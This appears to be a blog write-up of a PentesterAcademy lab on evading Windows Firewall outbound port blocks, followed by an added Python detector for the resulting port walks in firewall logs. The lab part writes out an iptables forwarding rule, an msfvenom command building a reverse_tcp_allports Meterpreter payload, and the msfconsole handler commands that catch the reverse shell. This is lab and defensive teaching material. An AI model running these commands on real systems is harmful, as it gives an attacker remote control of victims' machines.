Firewall Bypass: Outbound Range

Hello friends. In this post, I’ll share how you can bypass Windows Firewall (Automatic Outbound Open Port Detection).

I solved this lab on PentesterAcademy; you can also do this lab here if you are a subscribed member.

Scenario: A Windows machine is running with the Firewall turned on, and the outbound port range 4444-6009 is blocked. The task is to knock on all ports and get a reverse shell using Metasploit.

Below, we can see that the blocked port range is defined as 4444-6009.

On our attacker machine, I use iptables to forward port 6010 to port 4444.

$ iptables -A PREROUTING -t nat -i eth0 -p tcp --dport 4444:6010 -j DNAT --to-destination 10.5.17.234:4444
# --to-destination IP is the attacker machine's IP address.

After setting up the iptables rule, I make the payload using msfvenom.

$ msfvenom -p windows/meterpreter/reverse_tcp_allports lhost=10.5.17.234 lport=4444 -f exe -o bypass.exe
# reverse_tcp_allports will knock on all ports looking for a valid connection.

Now, transfer the file to the victim machine and download it using firewall and PowerShell.

Now, open msfconsole.

msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp_allports
msf6 exploit(multi/handler) > set lhost eth0
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > exploit

Now we can see we got our reverse shell.
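
Seen from the defender's side, the port knocking described above leaves a long run of outbound drops to one destination on consecutive ports, followed by an allowed connection on the next port. The Python below is an added example, not part of the original lab: it assumes Windows Firewall logging of dropped packets and successful connections is enabled and that the log uses the standard pfirewall.log field order; the host 10.0.0.5, the timestamps and the min_run threshold are constructed for illustration.

```python
from collections import defaultdict

# Field order of the Windows Firewall log (pfirewall.log) "#Fields:" header.
FIELDS = ("date time action protocol src-ip dst-ip src-port dst-port size "
          "tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path").split()

def parse(lines):
    """Yield one dict per log record, skipping header and malformed lines."""
    for line in lines:
        parts = line.split()
        if line.startswith("#") or len(parts) != len(FIELDS):
            continue
        yield dict(zip(FIELDS, parts))

def find_port_walks(lines, min_run=20):
    """Return (src, dst, first_port, last_port, allowed_port_or_None) per walk."""
    dropped, allowed = defaultdict(set), defaultdict(set)
    for r in parse(lines):
        if r["protocol"] != "TCP" or r["path"] != "SEND":
            continue                      # only outbound TCP is of interest
        bucket = dropped if r["action"] == "DROP" else allowed
        bucket[(r["src-ip"], r["dst-ip"])].add(int(r["dst-port"]))
    findings = []
    for pair, ports in dropped.items():
        ordered = sorted(ports)
        start = prev = ordered[0]
        for port in ordered[1:] + [None]:  # None flushes the final run
            if port is not None and port == prev + 1:
                prev = port
                continue
            if prev - start + 1 >= min_run:
                hit = prev + 1 if prev + 1 in allowed[pair] else None
                findings.append((*pair, start, prev, hit))
            start = prev = port
    return findings

def sample_log():
    """Constructed log: made-up host 10.0.0.5 walks the blocked range from the post."""
    row = "2021-01-01 10:00:00 {} TCP 10.0.0.5 {} 49800 {} 0 - 0 0 0 - - - SEND"
    log = ["#Fields: " + " ".join(FIELDS),
           row.format("ALLOW", "10.0.0.9", 443),
           row.format("DROP", "10.0.0.9", 8080)]
    log += [row.format("DROP", "10.5.17.234", p) for p in range(4444, 6010)]
    log.append(row.format("ALLOW", "10.5.17.234", 6010))
    return log

if __name__ == "__main__":
    for finding in find_port_walks(sample_log()):
        print(finding)
```

A finding whose last field is not None means the walk ended in a permitted connection, which is the case worth escalating first.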

If you face any problems, let me know in the comment section.
